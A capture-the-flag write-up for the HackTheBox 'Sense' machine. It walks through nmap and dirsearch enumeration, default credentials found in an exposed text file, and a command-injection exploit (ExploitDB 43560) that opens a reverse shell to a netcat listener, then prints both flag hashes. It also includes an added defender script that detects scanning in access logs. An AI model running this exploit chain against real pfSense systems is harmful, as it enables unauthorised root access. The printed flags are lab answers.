HackTheBox Sense
Writeup for HackTheBox Sense
Machine Synopsis
Sense, while not requiring many steps to complete, can be challenging for some as the proof of concept exploit that is publicly available is very unreliable. An alternate method using the same vulnerability is required to successfully gain access. (Source)
Enumeration
$ nmap -sC -sV -A 10.10.10.60
PORT STATE SERVICE VERSION
80/tcp open http lighttpd 1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
|_http-server-header: lighttpd/1.4.35
443/tcp open ssl/http lighttpd 1.4.35
|_http-title: Login
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Not valid before: 2017-10-14T19:21:35
|_Not valid after: 2023-04-06T19:21:35
|_http-server-header: lighttpd/1.4.35
|_ssl-date: TLS randomness does not represent time
It seems like there is a website, let’s check it out!
Trying the default credentials admin:pfsense did not work :(
Let’s run a dirsearch then!
Note: I was stuck here for a while because the important file was hidden in a txt file.
$ dirsearch -u https://10.10.10.60 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -f -e txt,php
...
[21:00:28] Starting:
[21:00:29] 301 - 0B - /themes -> https://10.10.10.60/themes/
[21:00:32] 301 - 0B - /css -> https://10.10.10.60/css/
[21:00:32] 301 - 0B - /includes -> https://10.10.10.60/includes/
[21:00:35] 301 - 0B - /javascript -> https://10.10.10.60/javascript/
[21:00:37] 200 - 271B - /changelog.txt
[21:00:38] 301 - 0B - /classes -> https://10.10.10.60/classes/
[21:00:41] 301 - 0B - /widgets -> https://10.10.10.60/widgets/
[21:00:54] 200 - 7KB - /tree/
[21:00:54] 301 - 0B - /tree -> https://10.10.10.60/tree/
[21:01:10] 301 - 0B - /shortcuts -> https://10.10.10.60/shortcuts/
[21:01:27] 301 - 0B - /installer -> https://10.10.10.60/installer/
[21:01:27] 302 - 0B - /installer/ -> installer.php
[21:01:37] 301 - 0B - /wizards -> https://10.10.10.60/wizards/
[21:09:19] 301 - 0B - /csrf -> https://10.10.10.60/csrf/
[21:18:25] 200 - 106B - /system-users.txt
[21:21:06] 301 - 0B - /filebrowser -> https://10.10.10.60/filebrowser/
...
There are two interesting txt files: changelog.txt and system-users.txt!
The changelog says that 2 of 3 vulnerabilities have been patched.
system-users.txt gives us some credentials to work with! Let’s try logging in!
Note: it turns out the credentials were actually rohit:pfsense instead of Rohit:company defaults.
The most important information here is probably the version number, so let’s do some research :D
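From the defender’s side, the dirsearch run above leaves a very recognisable trace in the web server’s access log: a burst of 404s from one client followed by 200s for files that should never be in the web root. The script below is an added example (not part of the original writeup) that parses constructed lighttpd-style log lines and flags both patterns; the log format, sample IPs and thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed lighttpd-style access-log lines (CLF plus the vhost field); not real logs.
SAMPLE_LOG = """\
10.10.14.3 10.10.10.60 - [14/Oct/2017:21:00:29 +0000] "GET /themes HTTP/1.1" 301 0 "-" "dirsearch"
10.10.14.3 10.10.10.60 - [14/Oct/2017:21:00:30 +0000] "GET /admin HTTP/1.1" 404 345 "-" "dirsearch"
10.10.14.3 10.10.10.60 - [14/Oct/2017:21:00:31 +0000] "GET /backup HTTP/1.1" 404 345 "-" "dirsearch"
10.10.14.3 10.10.10.60 - [14/Oct/2017:21:00:32 +0000] "GET /config HTTP/1.1" 404 345 "-" "dirsearch"
10.10.14.3 10.10.10.60 - [14/Oct/2017:21:00:33 +0000] "GET /test HTTP/1.1" 404 345 "-" "dirsearch"
10.10.14.3 10.10.10.60 - [14/Oct/2017:21:00:34 +0000] "GET /changelog.txt HTTP/1.1" 200 271 "-" "dirsearch"
10.10.14.3 10.10.10.60 - [14/Oct/2017:21:00:35 +0000] "GET /system-users.txt HTTP/1.1" 200 106 "-" "dirsearch"
10.10.14.7 10.10.10.60 - [14/Oct/2017:21:00:36 +0000] "GET /index.php HTTP/1.1" 200 4102 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<path>\S+)[^"]*" (?P<status>\d{3})')

# Files that should never be reachable on a pfSense web root (both turned up in the dirsearch run).
SENSITIVE_PATHS = {"/system-users.txt", "/changelog.txt"}

def parse(log_text):
    # Yield (ip, timestamp, path, status) for each well-formed line; skip the rest.
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m["ip"], datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"), m["path"], int(m["status"])

def analyse(log_text, window=60, min_requests=5, miss_ratio=0.5):
    # Flag IPs with a burst of mostly-404 requests inside `window` seconds (wordlist scanning),
    # and any 200 response for a path in SENSITIVE_PATHS (an exposed file was actually fetched).
    by_ip, sensitive_hits = defaultdict(list), []
    for ip, ts, path, status in parse(log_text):
        by_ip[ip].append((ts, status))
        if status == 200 and path in SENSITIVE_PATHS:
            sensitive_hits.append((ip, path))
    bruteforce = set()
    for ip, events in by_ip.items():
        events.sort()
        start = 0
        for end in range(len(events)):  # sliding window over this IP's requests
            while (events[end][0] - events[start][0]).total_seconds() > window:
                start += 1
            burst = events[start:end + 1]
            misses = sum(1 for _, s in burst if s == 404)
            if len(burst) >= min_requests and misses / len(burst) >= miss_ratio:
                bruteforce.add(ip)
                break
    return {"bruteforce": sorted(bruteforce), "sensitive_hits": sensitive_hits}
```

Running `analyse(SAMPLE_LOG)` flags 10.10.14.3 as a scanner and lists both sensitive fetches; the real fix is removing such files from the web root, with the log check as a safety net.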
Exploitation
After some Google searches, I found that the version has a command injection vulnerability listed on ExploitDB.
Let’s grab the script using searchsploit, start a netcat listener and exploit!
$ searchsploit -m 43560
$ python3 43560.py --rhost 10.10.10.60 --lhost 10.10.14.3 --lport 1234 --username rohit --password pfsense
CSRF token obtained
Running exploit...
Exploit completed
$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.60] 16918
sh: can't access tty; job control turned off
# whoami
root
# cat /home/rohit/user.txt
8721327cc232073b40d27d9c17e7348b
# cat /root/root.txt
d08c32a5d4f8c8b10e76eb51a69f1a86